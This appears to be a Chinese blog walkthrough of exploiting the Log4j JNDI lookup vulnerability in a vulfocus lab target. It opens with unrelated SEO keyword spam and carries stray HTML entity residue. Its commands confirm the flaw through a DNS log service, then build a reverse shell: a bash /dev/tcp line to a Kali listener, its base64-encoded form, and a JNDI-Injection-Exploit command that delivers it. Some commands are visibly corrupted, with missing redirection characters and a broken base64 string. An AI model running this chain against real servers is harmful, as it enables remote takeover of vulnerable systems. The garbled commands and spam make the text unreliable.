云霄网站建设,网站里面的图片做桌面不清晰,商会网站建设,做科技的网站一、漏洞原理
log4j(log for java)是由Java编写的可靠、灵活的日志框架#xff0c;是Apache旗下的一个开源项目#xff0c;使用Log4j#xff0c;我们更加方便的记录了日志信息#xff0c;它不但能控制日志输出的目的地#xff0c;也能控制日志输出的内容格式#xff1b;…一、漏洞原理
log4j(log for java)是由Java编写的可靠、灵活的日志框架是Apache旗下的一个开源项目使用Log4j我们更加方便的记录了日志信息它不但能控制日志输出的目的地也能控制日志输出的内容格式通过定义不同的日志级别可以更加精确的控制日志的生成过程从而达到我们应用的需求这一切都得益于一个灵活的配置文件并不需要我们更改代码。
由于log4j提供了lookup机制使日志中的${}也可进行执行在其中输入JNDI的payload即可进行执行。 使用lookup进行jndi注入通过ldap、rmi等使其访问不安全的服务。
二、验证漏洞
开启vulfocus的靶场 进入指定url后点一下连接进行抓包可以看到这次的输入是get型 使用开源的dnslogceye.io 先url编码 点击发送DNSLOG收到了访问请求
成功验证漏洞存在
三、反弹shell
反弹shell采取如图结构 监听机kali: 192.168.92.128
反弹shell
bash -i /dev/tcp/192.168.92.128/4444 01由于runtime不会执行管道所以需要将反弹shell使用base64加密
bash -c {echo,加密后文本}|{base64,-d}|{bash,-i}YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjkyLjEyOC80NDQ0IDAJjEbash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjkyLjEyOC80NDQ0IDAJjE}|{base64,-d}|{bash,-i}https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar是jndi注入工具起到了上述危险服务器的作用。
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjkyLjEyOC80NDQ0IDAJjE}|{base64,-d}|{bash,-i} -A 10.88.84.219此处必须复制无版本号的rmi否则不会成功理由未知。